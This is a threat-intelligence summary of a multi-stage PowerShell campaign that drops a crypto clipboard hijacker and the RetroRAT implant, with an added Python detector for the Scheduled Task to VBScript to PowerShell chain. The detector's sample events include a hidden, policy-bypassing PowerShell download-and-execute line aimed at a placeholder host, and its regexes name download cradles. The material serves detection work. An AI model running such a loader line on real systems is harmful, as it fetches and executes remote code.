Operation DualScript: Multi-Stage PowerShell Malware Targets Crypto
Essential information
- Published: 31/03/2026 07:10
- Modified: 31/03/2026 19:19
- Tags: 2026-03-31, clipboard hijacking, cryptocurrency, evasion techniques, financial theft, in-memory execution, multi-stage, powershell, retrorat
- Related entities: 1 observable, 12 MITRE techniques, 1 malware, 6 others
Description
Operation DualScript is a sophisticated multi-stage malware campaign targeting cryptocurrency and financial activity. It uses Windows Scheduled Tasks, VBScript launchers, and PowerShell execution to maintain persistence while leaving few artifacts on disk. The attack runs two parallel chains: a web-based PowerShell loader that deploys a cryptocurrency clipboard hijacker, and a second chain that executes the RetroRAT implant in memory. RetroRAT monitors user activity, captures keystrokes, and tracks interactions with financial services to harvest sensitive information. The malware employs several anti-analysis techniques and establishes a command-and-control channel for remote access and data exfiltration. The campaign illustrates the growing abuse of trusted system utilities and in-memory execution to evade traditional detection mechanisms.
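The description names the persistence and execution chain (Scheduled Task, VBScript launcher, PowerShell loader running in memory) but not how a defender would spot it in telemetry. The following detection logic is an added example, not code from the original report or from any vendor: it assumes Sysmon-style process-creation events (PID, parent PID, image path, command line) and runs over a constructed sample where paths, hostnames and the URL are placeholders, not indicators from the campaign. It flags PowerShell spawned by a script host, scores the command line for loader features (hidden window, policy bypass, encoded command, download cradle, `IEX`), and adds weight when the script host was itself started by the Task Scheduler service.

```python
"""Added detection example (not from the original report): flag the
Scheduled Task -> VBScript launcher -> PowerShell chain described above.
Runs over constructed Sysmon-style process-creation events."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str    # full command line as logged


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Command-line features typical of a web-based PowerShell loader.
PS_INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "bypass_policy": re.compile(r"-e(?:x(?:ecutionpolicy)?|p)\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
    "in_memory_exec": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_task_scheduler_host(ev: ProcEvent) -> bool:
    """True if the process is the Task Scheduler service host (svchost hosting
    the Schedule service on current Windows, taskeng.exe on older builds)."""
    name = basename(ev.image)
    if name == "taskeng.exe":
        return True
    return name == "svchost.exe" and "schedule" in ev.cmdline.lower()


def analyze(events):
    """Return one finding per PowerShell process whose parent is a script host.
    Score: 1 for the chain itself, +1 per command-line indicator, +2 when the
    script host was itself launched by the Task Scheduler."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if basename(ev.image) != "powershell.exe":
            continue
        parent = by_pid.get(ev.ppid)
        if parent is None or basename(parent.image) not in SCRIPT_HOSTS:
            continue
        grandparent = by_pid.get(parent.ppid)
        from_task = grandparent is not None and is_task_scheduler_host(grandparent)
        hits = sorted(name for name, rx in PS_INDICATORS.items() if rx.search(ev.cmdline))
        chain = [basename(p.image) for p in (grandparent, parent, ev) if p is not None]
        findings.append({
            "pid": ev.pid,
            "chain": chain,
            "launcher_script": parent.cmdline,
            "from_scheduled_task": from_task,
            "indicators": hits,
            "score": 1 + len(hits) + (2 if from_task else 0),
        })
    return findings


def high_confidence(events, threshold=4):
    """Findings worth an alert; lower scores are left for hunting/triage."""
    return [f for f in analyze(events) if f["score"] >= threshold]


# Constructed sample events; hostnames, paths and the URL are placeholders, not IoCs.
SAMPLE_EVENTS = [
    ProcEvent(900, 600, r"C:\Windows\System32\svchost.exe",
              "svchost.exe -k netsvcs -p -s Schedule"),
    ProcEvent(1200, 900, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\Public\update.vbs"'),
    ProcEvent(1300, 1200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://loader.example.invalid/stage1')\""),
    # Benign: an interactive admin running a script from Explorer.
    ProcEvent(2000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2100, 2000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"),
    # Low score: a logon VBScript that calls PowerShell with no loader features.
    ProcEvent(2500, 1, r"C:\Windows\System32\userinit.exe", "userinit.exe"),
    ProcEvent(3000, 2500, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "\\fs01\netlogon\logon.vbs"'),
    ProcEvent(3100, 3000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -File C:\scripts\map_drives.ps1"),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f["score"], " -> ".join(f["chain"]), f["indicators"])
```

The scoring keeps the plain wscript-to-PowerShell chain visible (logon scripts do this legitimately) while only the combination of Task Scheduler parentage plus download-and-execute features crosses the alert threshold. In production the same logic would read Sysmon Event ID 1 or EDR process telemetry, and the scheduled-task side can be corroborated with task registration events (Security 4698 / TaskScheduler operational log).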